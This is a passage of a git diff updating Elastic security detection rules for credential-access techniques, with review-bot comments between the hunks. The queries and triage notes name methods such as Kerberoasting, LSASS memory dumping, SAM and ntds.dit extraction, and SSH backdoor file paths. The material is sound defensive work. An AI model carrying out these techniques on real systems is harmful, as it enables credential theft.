More information can\nbe found [here](https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview).\n\nAttackers can also perform \"Targeted Kerberoasting\", which consists of adding fake SPNs to user accounts that they have\nwrite privileges to, making them potentially vulnerable to Kerberoasting.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate if the target account is a member of privileged groups (Domain Admins, Enterprise Admins, etc.).\n- Investigate if tickets have been requested for the target account.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- The use of user accounts as service accounts is a bad security practice and should not be allowed in the domain. The\nsecurity team should map and monitor any potential benign true positive (B-TP), especially if the account is privileged.\nDomain Administrators that define this kind of setting can put the domain at risk as user accounts don't have the same\nsecurity standards as computer accounts (which have long, complex, random passwords that change frequently), exposing\nthem to credential cracking attacks (Kerberoasting, brute force, etc.).\n\n### Response and remediation \n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services. 
Prioritize privileged accounts.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the servicePrincipalName Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID f3a64788-5306-11d1-a9c5-0000f80367c1 -AuditFlags Success\n```\n", - "query": "event.action:\"Directory Service Changes\" and event.code:5136 and winlog.event_data.ObjectClass:\"user\" \nand winlog.event_data.AttributeLDAPDisplayName:\"servicePrincipalName\"\n", + "note": "## Triage and analysis\n\n### Investigating User account exposed to Kerberoasting\n\nService Principal Names (SPNs) are names by which Kerberos clients uniquely identify service instances for Kerberos target\ncomputers.\n\nBy default, only computer accounts have SPNs, which creates no significant risk, since machine accounts have a default\ndomain policy that rotates their passwords every 30 days, and the password is composed of 120 random characters, making\nthem invulnerable to Kerberoasting.\n\nA user account with an SPN assigned is considered a service account, and is 
accessible to the entire domain. If any\nuser in the directory requests a ticket-granting service (TGS), the domain controller will encrypt it with the secret\nkey of the account executing the service. An attacker can potentially perform a Kerberoasting attack with this\ninformation, as the human-defined password is likely to be less complex.\n\nFor scenarios where SPNs cannot be avoided on user accounts, Microsoft provides the Group Managed Service Accounts (gMSA)\nfeature, which ensures that account passwords are robust and changed regularly and automatically. More information can\nbe found [here](https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview).\n\nAttackers can also perform \"Targeted Kerberoasting\", which consists of adding fake SPNs to user accounts that they have\nwrite privileges to, making them potentially vulnerable to Kerberoasting.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate if the target account is a member of privileged groups (Domain Admins, Enterprise Admins, etc.).\n- Investigate if tickets have been requested for the target account.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- The use of user accounts as service accounts is a bad security practice and should not be allowed in the domain. 
The\nsecurity team should map and monitor any potential benign true positive (B-TP), especially if the account is privileged.\nDomain Administrators that define this kind of setting can put the domain at risk as user accounts don't have the same\nsecurity standards as computer accounts (which have long, complex, random passwords that change frequently), exposing\nthem to credential cracking attacks (Kerberoasting, brute force, etc.).\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services. Prioritize privileged accounts.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "event.action:\"Directory Service Changes\" and event.code:5136 and winlog.event_data.ObjectClass:\"user\"\nand winlog.event_data.AttributeLDAPDisplayName:\"servicePrincipalName\"\n", "references": [ "https://www.thehacker.recipes/ad/movement/access-controls/targeted-kerberoasting", "https://www.qomplx.com/qomplx-knowledge-kerberoasting-attacks-explained/", 
@@ -21,8 +21,31 @@ "https://adsecurity.org/?p=280", "https://github.com/OTRF/Set-AuditRule" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ObjectClass", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "0b2f3da5-b5ec-47d1-908b-6ebb74814289", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the servicePrincipalName Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID f3a64788-5306-11d1-a9c5-0000f80367c1 -AuditFlags Success\n```", "severity": "high", "tags": [ "Elastic", @@ -58,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ssh_backdoor_log.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ssh_backdoor_log.json index 9e45afac8f290..17d6623ed2330 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ssh_backdoor_log.json 
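Review bot: The new `required_fields` entry types `event.code` as `keyword`, while the query in the preceding hunk matches it as a bare number, `event.code:5136`, whereas the Shadow Credentials rule at the top of this diff quotes the same keyword field as `event.code:"5136"`. KQL coerces the numeric literal, so this is consistency only, but quoting it would keep the two rules aligned and make the keyword intent visible.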
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ssh_backdoor_log.json 
@@ -14,14 +14,42 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential OpenSSH Backdoor Logging Activity", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "file where event.type == \"change\" and process.executable : (\"/usr/sbin/sshd\", \"/usr/bin/ssh\") and\n (\n file.name : (\".*\", \"~*\") or\n file.extension : (\"in\", \"out\", \"ini\", \"h\", \"gz\", \"so\", \"sock\", \"sync\", \"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\") or\n file.path : \n (\n \"/private/etc/*--\", \n \"/usr/share/*\", \n \"/usr/include/*\", \n \"/usr/local/include/*\", \n \"/private/tmp/*\", \n \"/private/var/tmp/*\",\n \"/usr/tmp/*\", \n \"/usr/share/man/*\", \n \"/usr/local/share/*\", \n \"/usr/lib/*.so.*\", \n \"/private/etc/ssh/.sshd_auth\",\n \"/usr/bin/ssd\", \n \"/private/var/opt/power\", \n \"/private/etc/ssh/ssh_known_hosts\", \n \"/private/var/html/lol\", \n \"/private/var/log/utmp\", \n \"/private/var/lib\",\n \"/var/run/sshd/sshd.pid\",\n \"/var/run/nscd/ns.pid\",\n \"/var/run/udev/ud.pid\",\n \"/var/run/udevd.pid\"\n )\n )\n", + "note": "", + "query": "file where event.type == \"change\" and process.executable : (\"/usr/sbin/sshd\", \"/usr/bin/ssh\") and\n (\n (file.name : (\".*\", \"~*\", \"*~\") and not file.name : (\".cache\", \".viminfo\", \".bash_history\")) or\n file.extension : (\"in\", \"out\", \"ini\", \"h\", \"gz\", \"so\", \"sock\", \"sync\", \"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\") or\n file.path :\n (\n \"/private/etc/*--\",\n \"/usr/share/*\",\n \"/usr/include/*\",\n \"/usr/local/include/*\",\n \"/private/tmp/*\",\n \"/private/var/tmp/*\",\n \"/usr/tmp/*\",\n \"/usr/share/man/*\",\n \"/usr/local/share/*\",\n 
\"/usr/lib/*.so.*\",\n \"/private/etc/ssh/.sshd_auth\",\n \"/usr/bin/ssd\",\n \"/private/var/opt/power\",\n \"/private/etc/ssh/ssh_known_hosts\",\n \"/private/var/html/lol\",\n \"/private/var/log/utmp\",\n \"/private/var/lib\",\n \"/var/run/sshd/sshd.pid\",\n \"/var/run/nscd/ns.pid\",\n \"/var/run/udev/ud.pid\",\n \"/var/run/udevd.pid\"\n )\n )\n", "references": [ "https://github.com/eset/malware-ioc/tree/master/sshdoor", "https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "f28e2be4-6eca-4349-bdd9-381573730c22", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -65,5 +93,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_storage_account_key_regenerated.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_storage_account_key_regenerated.json index 3f286081c49f2..0e92fa8991092 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_storage_account_key_regenerated.json 
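Review bot: The new `not file.name : (".cache", ".viminfo", ".bash_history")` clause in the query excludes these names wherever they occur, since it keys on `file.name` alone and not on the directory, and the commit records no rationale for it; with `note` now empty there is nowhere a responder can see why these dotfiles are carved out of the `.*` branch. Presumably they were false-positive sources on interactive sessions, but the exclusion also means a change to one of those names by the sshd/ssh executables is never surfaced, which should be stated as a known gap. Suggest adding a short `note` with a False positive analysis entry explaining the three exclusions and the new `*~` pattern, or scoping the exclusion with `file.path` if the noise comes from a known location.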
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_storage_account_key_regenerated.json @@ -14,13 +14,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Storage Account Key Regenerated", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.STORAGE/STORAGEACCOUNTS/REGENERATEKEY/ACTION\" and event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage?tabs=azure-portal" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "1e0b832e-957e-43ae-b319-db82d228c908", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -49,5 +74,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_comsvcs_imageload.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_comsvcs_imageload.json index 5b27c1ea0694c..9d6aed291fd03 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_comsvcs_imageload.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_comsvcs_imageload.json @@ -11,13 +11,56 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Credential Access via Renamed COM+ Services DLL", - "note": "## Config\n\nYou will need to enable logging of ImageLoads in your Sysmon configuration to include COMSVCS.DLL by Imphash or Original\nFile Name.", + "note": "", "query": "sequence by process.entity_id with maxspan=1m\n [process where event.category == \"process\" and\n process.name : \"rundll32.exe\"]\n [process where event.category == \"process\" and event.dataset : \"windows.sysmon_operational\" and event.code == \"7\" and\n (file.pe.original_file_name : \"COMSVCS.DLL\" or file.pe.imphash : \"EADBCCBB324829ACB5F2BBE87E5549A8\") and\n /* renamed COMSVCS */\n not file.name : \"COMSVCS.DLL\"]\n", "references": [ "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.pe.imphash", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "c5c9f591-d111-4cf8-baec-c26a39bc31ef", + "setup": "You will need to enable logging of ImageLoads in your Sysmon configuration to include COMSVCS.DLL by Imphash or Original\nFile Name.", "severity": "high", "tags": [ "Elastic", @@ -51,5 +94,5 @@ } ], "type": "eql", - "version": 3 + "version": 5 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_lsass_access_memdump.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_lsass_access_memdump.json index b36ef7b3f68b0..08b025b6c582a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_lsass_access_memdump.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_lsass_access_memdump.json 
@@ -11,13 +11,36 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Credential Access via LSASS Memory Dump", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n \n /* DLLs exporting MiniDumpWriteDump API to create an lsass mdmp*/\n winlog.event_data.CallTrace : (\"*dbghelp*\", \"*dbgcore*\") and\n \n /* case of lsass crashing */\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\", \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\")\n", + "note": "", + "query": "process where event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* DLLs exporting MiniDumpWriteDump API to create an lsass mdmp*/\n winlog.event_data.CallTrace : (\"*dbghelp*\", \"*dbgcore*\") and\n\n /* case of lsass crashing */\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\", \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\")\n", "references": [ "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz" ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallTrace", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetImage", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "9960432d-9b26-409f-972b-839a959e79e2", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for 
versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -52,5 +75,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_lsass_access_via_snapshot.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_lsass_access_via_snapshot.json index 3b0976b78c9f0..e912d2c61a98b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_lsass_access_via_snapshot.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_lsass_access_via_snapshot.json 
@@ -11,14 +11,32 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential LSASS Memory Dump via PssCaptureSnapShot", - "note": "## Config\n\nThis is meant to run only on datasources using Elastic Agent 7.14+ since versions prior to that will be missing the threshold\nrule cardinality feature.", + "note": "", "query": "event.category:process and event.code:10 and\n winlog.event_data.TargetImage:(\"C:\\\\Windows\\\\system32\\\\lsass.exe\" or\n \"c:\\\\Windows\\\\system32\\\\lsass.exe\" or\n \"c:\\\\Windows\\\\System32\\\\lsass.exe\")\n", "references": [ "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", "https://twitter.com/sbousseaden/status/1280619931516747777?lang=en" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetImage", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "0f93cb9a-1931-48c2-8cd0-f173fd3e5283", + "setup": "This is meant to run only on datasources using Elastic Agent 7.14+ since versions prior to that will be missing the threshold\nrule cardinality feature.", "severity": "high", "tags": [ "Elastic", @@ -65,5 +83,5 @@ }, "timestamp_override": "event.ingested", "type": "threshold", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_winreg_access_via_sebackup_priv.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_winreg_access_via_sebackup_priv.json index f2b832d09a9cf..5a281dd4d312f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_winreg_access_via_sebackup_priv.json 
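Review bot: The `winlog.event_data.TargetImage` match in the query enumerates three explicit spellings of the lsass.exe path, and because a KQL term match on a keyword field is case-sensitive unless the mapping applies a normalizer, any other casing the event writes (for example the uppercase `WINDOWS` form that the sibling LSASS memory-dump rule above patterns on with `?:\\WINDOWS\\system32\\lsass.exe`) falls outside the threshold count; the new `required_fields` entry typing the field as `unknown` underlines that no normalizer can be assumed. A single pattern in KQL form such as `winlog.event_data.TargetImage:*\\lsass.exe` would cover the variants, assuming leading wildcards are permitted in the deployment. The enclosing rule document starts before and continues after this hunk.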
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_winreg_access_via_sebackup_priv.json 
@@ -11,14 +11,42 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Remote Registry Access via SeBackupPrivilege", - "note": "## Config\n\nThe 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nLogon/Logoff >\nSpecial Logon (Success)\n```\n", - "query": "sequence by host.id, winlog.event_data.SubjectLogonId with maxspan=1m\n [iam where event.action == \"logged-in-special\" and\n winlog.event_data.PrivilegeList : \"SeBackupPrivilege\"]\n [any where event.action == \"Detailed File Share\" and winlog.event_data.RelativeTargetName : \"winreg\"]\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Remote Registry Access via SeBackupPrivilege\n\nSeBackupPrivilege is a privilege that allows file content retrieval, designed to enable users to create backup copies of\nthe system. Since it is impossible to make a backup of something you cannot read, this privilege comes at the cost of\nproviding the user with full read access to the file system. This privilege must bypass any access control list (ACL) placed in the system.\n\nThis rule identifies remote access to the registry using an account with Backup Operators group membership. 
This may\nindicate an attempt to exfiltrate credentials by dumping the Security Account Manager (SAM) registry hive in preparation\nfor credential access and privileges elevation.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the activities done by the subject user the login session. The field `winlog.event_data.SubjectLogonId`\ncan be used to get this data.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate abnormal behaviors observed by the subject user such as network connections, registry or file\nmodifications, and processes created.\n- Investigate if the registry file was retrieved or exfiltrated.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, benign true positives (B-TPs) can be added as exceptions\nif necessary. \n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Limit or disable the involved user account to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "sequence by host.id, winlog.event_data.SubjectLogonId with maxspan=1m\n [iam where event.action == \"logged-in-special\" and\n winlog.event_data.PrivilegeList : \"SeBackupPrivilege\" and\n\n /* excluding accounts with existing privileged access */\n not winlog.event_data.PrivilegeList : \"SeDebugPrivilege\"]\n [any where event.action == \"Detailed File Share\" and winlog.event_data.RelativeTargetName : \"winreg\"]\n", "references": [ "https://github.com/mpgn/BackupOperatorToDA", "https://raw.githubusercontent.com/Wh04m1001/Random/main/BackupOperators.cpp" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.PrivilegeList", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.RelativeTargetName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectLogonId", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "47e22836-4a16-4b35-beee-98f6c4ee9bf2", + "setup": "The 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with 
with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nLogon/Logoff >\nSpecial Logon (Success)\n```", "severity": "medium", "tags": [ "Elastic", @@ -68,5 +96,5 @@ } ], "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_symbolic_link_to_shadow_copy_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_symbolic_link_to_shadow_copy_created.json index 7bab4403c4114..e708d6243e2d9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_symbolic_link_to_shadow_copy_created.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_symbolic_link_to_shadow_copy_created.json 
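Review bot: The new `not winlog.event_data.PrivilegeList : "SeDebugPrivilege"` clause in the query drops every special-logon session that already holds SeDebugPrivilege, so a remote `winreg` access from a compromised administrative account is no longer sequenced; the inline comment calls this excluding existing privileged access, but the rewritten `note` in the same hunk does not mention the gap. Suggest stating it in the False positive analysis section, e.g. `Sessions that already hold SeDebugPrivilege are excluded from this rule to reduce noise from administrative activity; remote registry access by such accounts is not covered here.`. Two wording slips in the new text are worth fixing while the strings are being rewritten: `the subject user the login session` in the note (missing "during") and `is required be configured` plus `with with` in the new `setup` string.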
@@ -16,16 +16,39 @@ "language": "eql", "license": "Elastic License v2", "name": "Symbolic Link to Shadow Copy Created", - "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt\nto discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active\nDirectory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is\nneeded to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules \n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation \n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited\n to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested) \n \n``` \nComputer Configuration > \nPolicies > \nWindows Settings > \nSecurity Settings > \nAdvanced Audit Policies Configuration > \nSystem Audit Policies > \nObject Access > \nAudit File System (Success,Failure) \nAudit Handle Manipulation (Success,Failure) \n``` \n \nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or 
powershell.exe with the correct arguments. \nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule. \n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\",\"process_created\") and \n process.pe.original_file_name in (\"Cmd.Exe\",\"PowerShell.EXE\") and \n \n /* Create Symbolic Link to Shadow Copies */\n process.args : (\"*mklink*\", \"*SymbolicLink*\") and process.command_line : (\"*HarddiskVolumeShadowCopy*\")\n", + "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt\nto discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active\nDirectory (AD) is in use, often the ntds.dit file is 